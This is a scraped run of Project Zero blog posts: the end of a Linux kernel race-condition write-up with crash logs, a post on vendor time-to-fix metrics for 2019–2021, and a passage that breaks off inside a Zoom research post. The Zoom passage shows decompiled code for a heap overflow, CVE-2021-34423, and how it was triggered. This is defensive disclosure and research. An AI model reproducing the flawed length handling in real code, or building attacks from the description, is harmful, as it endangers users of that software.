Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Call Trace:

[...]

 unix_stream_recvmsg+0x53/0x70

[...]

 __sys_recvfrom+0x166/0x180

[...]

 __x64_sys_recvfrom+0x25/0x30

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

---[ end trace 39a81eb3a52e239c ]---

=============================================================================

BUG skbuff_head_cache (Tainted: G      D          ): Poison overwritten

-----------------------------------------------------------------------------

INFO: 0x00000000d7142451-0x00000000d7142451 @offset=68. First byte 0x6c instead of 0x6b

INFO: Slab 0x000000002f95c13c objects=32 used=32 fp=0x0000000000000000 flags=0x17ffffc0010200

INFO: Object 0x00000000ef9c59c8 @offset=0 fp=0x00000000100a3918

Object   00000000ef9c59c8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000097454be8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000035f1d791: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000af71b907: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000d2d371e: 6b 6b 6b 6b 6c 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkklkkkkkkkkkkk

Object   0000000000744b35: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000794f2935: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006dc06746: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000005fb18682: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000072eb8dd2: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000b5b572a9: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000085d6850b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006346150b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000ddd1ced: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b a5  kkkkkkkkkkkkkkk.

Padding  00000000e00889a7: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a  ZZZZZZZZZZZZZZZZ

Padding  00000000d190015f: 5a 5a 5a 5a 5a 5a 5a 5a                          ZZZZZZZZ

CPU: 7 PID: 1641 Comm: gnome-shell Tainted: G    B D           5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

Call Trace:

 dump_stack+0x6b/0x83

 check_bytes_and_report.cold+0x79/0x9a

 check_object+0x217/0x260

[...]

 alloc_debug_processing+0xd5/0x130

 ___slab_alloc+0x511/0x570

[...]

 __slab_alloc+0x1c/0x30

 kmem_cache_alloc_node+0x1f3/0x210

 __alloc_skb+0x46/0x1f0

 alloc_skb_with_frags+0x4d/0x1b0

 sock_alloc_send_pskb+0x1f3/0x220

[...]

 unix_stream_sendmsg+0x268/0x4d0

 sock_sendmsg+0x5e/0x60

 ____sys_sendmsg+0x22e/0x270

[...]

 ___sys_sendmsg+0x75/0xb0

[...]

 __sys_sendmsg+0x59/0xa0

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

FIX skbuff_head_cache: Restoring 0x00000000d7142451-0x00000000d7142451=0x6b

FIX skbuff_head_cache: Marking all objects used

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Conclusion(s)

Hitting a race can become easier if, instead of racing two threads against each other, you race one thread against a hardware timer to create a gigantic timing window for the other thread. Hence the title! On the other hand, it introduces extra complexity because now you have to think about how timers actually work, and turns out, time is a complicated concept...

This shows how at least some really tight races can still be hit and we should treat them as security bugs, even if it seems like they'd be very hard to hit at first glance.

Also, precisely timing races is hard, and the details of how long it actually takes the CPU to get from one point to another are mysterious. (As not only exploit writers know, but also anyone who's ever wanted to benchmark a performance-relevant change...)

Appendix: How impatient are interrupts?

I did also play around with this stuff on arm64 a bit, and I was wondering: At what points do interrupts actually get delivered? Does an incoming interrupt force the CPU to drop everything immediately, or do inflight operations finish first? This gets particularly interesting on phones that contain two or three different types of CPUs mixed together.

On a Pixel 4 (which has 4 slow in-order cores, 3 fast cores, and 1 faster core), I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register, while running this loop:

  400680:        91000442         add        x2, x2, #0x1

  400684:        91000421         add        x1, x1, #0x1

  400688:        9ac20820         udiv        x0, x1, x2

  40068c:        91006800         add        x0, x0, #0x1a

  400690:        91000400         add        x0, x0, #0x1

  400694:        91000442         add        x2, x2, #0x1

  400698:        91000421         add        x1, x1, #0x1

  40069c:        91000442         add        x2, x2, #0x1

  4006a0:        91000421         add        x1, x1, #0x1

  4006a4:        9ac20820         udiv        x0, x1, x2

  4006a8:        91006800         add        x0, x0, #0x1a

  4006ac:        91000400         add        x0, x0, #0x1

  4006b0:        91000442         add        x2, x2, #0x1

  4006b4:        91000421         add        x1, x1, #0x1

  4006b8:        91000442         add        x2, x2, #0x1

  4006bc:        91000421         add        x1, x1, #0x1

  4006c0:        17fffff0         b        400680 <main+0xe0>

The logged interrupt PCs had the following distribution on a slow in-order core:

A histogram of PC register values, where most instructions in the loop have roughly equal frequency, the instructions after udiv instructions have twice the frequency, and two other instructions have zero frequency.

and this distribution on a fast out-of-order core:

A histogram of PC register values, where the first instruction of the loop has very high frequency, the following 4 instructions have near-zero frequency, and the following instructions have low frequencies

As always, out-of-order (OOO) cores make everything weird, and the start of the loop seems to somehow "provide cover" for the following instructions; but on the in-order core, we can see that more interrupts arrive after the slow udiv instructions. So apparently, when one of those is executing while an interrupt arrives, it continues executing and doesn't get aborted somehow?

With the following loop, which has a LDR instruction mixed in that accesses a memory location that is constantly being modified by another thread:

  4006a0:        91000442         add        x2, x2, #0x1

  4006a4:        91000421         add        x1, x1, #0x1

  4006a8:        9ac20820         udiv        x0, x1, x2

  4006ac:        91006800         add        x0, x0, #0x1a

  4006b0:        91000400         add        x0, x0, #0x1

  4006b4:        91000442         add        x2, x2, #0x1

  4006b8:        91000421         add        x1, x1, #0x1

  4006bc:        91000442         add        x2, x2, #0x1

  4006c0:        91000421         add        x1, x1, #0x1

  4006c4:        9ac20820         udiv        x0, x1, x2

  4006c8:        91006800         add        x0, x0, #0x1a

  4006cc:        91000400         add        x0, x0, #0x1

  4006d0:        91000442         add        x2, x2, #0x1

  4006d4:        f9400061         ldr        x1, [x3]

  4006d8:        91000421         add        x1, x1, #0x1

  4006dc:        91000442         add        x2, x2, #0x1

  4006e0:        91000421         add        x1, x1, #0x1

  4006e4:        17ffffef         b        4006a0 <main+0x100>

the cache-missing loads obviously have a large influence on the timing. On the in-order core:

A histogram of interrupt instruction pointers, showing that most interrupts are delivered with PC pointing to the instruction after the high-latency load instruction.

On the OOO core:

A similar histogram as the previous one, except that an even larger fraction of interrupt PCs are after the high-latency load instruction.

What is interesting to me here is that the timer interrupts seem to again arrive after the slow load - implying that if an interrupt arrives while a slow memory access is in progress, the interrupt handler may not get to execute until the memory access has finished? (Unless maybe on the OOO core the interrupt handler can start speculating already? I wouldn't really expect that, but could imagine it.)

On an X86 Skylake CPU, we can do a similar test:

    11b8:        48 83 c3 01                  add    $0x1,%rbx

    11bc:        48 83 c0 01                  add    $0x1,%rax

    11c0:        48 01 d8                     add    %rbx,%rax

    11c3:        48 83 c3 01                  add    $0x1,%rbx

    11c7:        48 83 c0 01                  add    $0x1,%rax

    11cb:        48 01 d8                     add    %rbx,%rax

    11ce:        48 03 02                     add    (%rdx),%rax

    11d1:        48 83 c0 01                  add    $0x1,%rax

    11d5:        48 83 c3 01                  add    $0x1,%rbx

    11d9:        48 01 d8                     add    %rbx,%rax

    11dc:        48 83 c3 01                  add    $0x1,%rbx

    11e0:        48 83 c0 01                  add    $0x1,%rax

    11e4:        48 01 d8                     add    %rbx,%rax

    11e7:        eb cf                        jmp    11b8 <main+0xf8>

with a similar result:

A histogram of interrupt instruction pointers, showing that almost all interrupts were delivered with RIP pointing to the instruction after the high-latency load.

This means that if the first access to the file terminated our race window (which is not the case), we probably wouldn't be able to win the race by making the access to the file slow - instead we'd have to slow down one of the operations before that. (But note that I have only tested simple loads, not stores or read-modify-write operations here.)

‚úáGoogle Project Zero

A walk through Project Zero metrics

By: Ryan ‚ÄĒ

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data¬†aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor

Total bugs

Fixed by day 90

Fixed during
grace period

Exceeded deadline

& grace period

Avg days to fix

Apple

84

73 (87%)

7 (8%)

4 (5%)

69

Microsoft

80

61 (76%)

15 (19%)

4 (5%)

83

Google

56

53 (95%)

2 (4%)

1 (2%)

44

Linux

25

24 (96%)

0 (0%)

1 (4%)

25

Adobe

19

15 (79%)

4 (21%)

0 (0%)

65

Mozilla

10

9 (90%)

1 (10%)

0 (0%)

46

Samsung

10

8 (80%)

2 (20%)

0 (0%)

72

Oracle

7

3 (43%)

0 (0%)

4 (57%)

109

Others*

55

48 (87%)

3 (5%)

4 (7%)

44

TOTAL

346

294 (84%)

34 (10%)

18 (5%)

61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a relatively small sample size of only about 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.

Average number of days to fix bugs across all vendors is 61 days. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor

Bugs in 2019

(avg days to fix)

Bugs in 2020

(avg days to fix)

Bugs in 2021

(avg days to fix)

Apple

61 (71)

13 (63)

11 (64)

Microsoft

46 (85)

18 (87)

16 (76)

Google

26 (49)

13 (22)

17 (53)

Linux

12 (32)

8 (22)

5 (15)

Others*

54 (63)

35 (54)

14 (29)

TOTAL

199 (67)

87 (54)

63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux overall have reduced their time to fix during the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the others not represented on the chart have collectively cut their time to fix in more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period used 9 times (notably with half being by Microsoft), versus the slightly lower average of 12.5 in the other years

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor

Total bugs

Avg fix time

iOS

76

70

Android (Samsung)

10

72

Android (Pixel)

6

72

The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser

Bugs

Avg days from bug report to public patch

Avg days from public patch to release

Avg days from bug report to release

Chrome

40

5.3

24.6

29.9

WebKit

27

11.6

61.1

72.7

Firefox

8

16.6

21.1

37.8

Total

75

8.8

37.3

46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to "Avg days from public patch to release" column:

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, Webkit, and Chrome. The fact that Webkit is still on the higher end of the histogram tells us that most of their time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, with time from bug report to releasing a fix in the stable channel in 30 days. The time to patch is very fast here, with just an average of 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public is the bulk of the overall time window, though overall we still see the Chrome (blue) bars of the histogram toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome ‚Äď with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest number of days to release a patch at 73 days. Their time to land the fix publicly is in the middle between Chrome and Firefox, but unfortunately this leaves a very long amount of time for opportunistic attackers to find the patch and exploit it prior to the fix being made available to users. This can be seen by the Apple (red) bars of the second histogram mostly being on the right side of the graph, and every one of them except one being past the 30-day mark.

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patch effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de-facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of use of grace periods as well as lack of missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

‚úáGoogle Project Zero

Zooming in on Zero-click Exploits

By: Ryan ‚ÄĒ

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox‚Äôs XMPP parser by extending the class StanzaExtension¬†and implementing the method newInstance¬†to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler¬†class. Application developers extend this class, implementing the method handleMessage¬†with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‚ÄėOn‚Äô that handle specific events. I spent a fair amount of time analyzing these code paths, but didn‚Äôt find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up¬†of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different than the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn’t load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don’t have source code available. Instead, I compiled my own fuzzing stub that called the function I wanted to fuzz as a relocatable that defined fopen, and loaded it using LD_PRELOAD when executing the MMR binary. Then my code would take control of execution the first time that the MMR binary called fopen, and was able to call the function being fuzzed.

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a great deal of packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains a great deal of classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t,  which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(

msg_db, &this->str_len, consume_bytes, error_out);

  str_len = this->str_len;

  if ( str_len )

  {

    mem = operator new[](str_len);

    out_len = 0;

    this->str_mem = mem;

    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db, mem, &out_len);

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db_t* msg, signed __int8 *mem,

unsigned int *len)

{

  if ( !msg->invalid )

  {

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);

    if ( !msg->invalid )

    {

      if ( *len )

        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read(msg, mem, *len, 0);

    }

  }

  return msg;

}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.

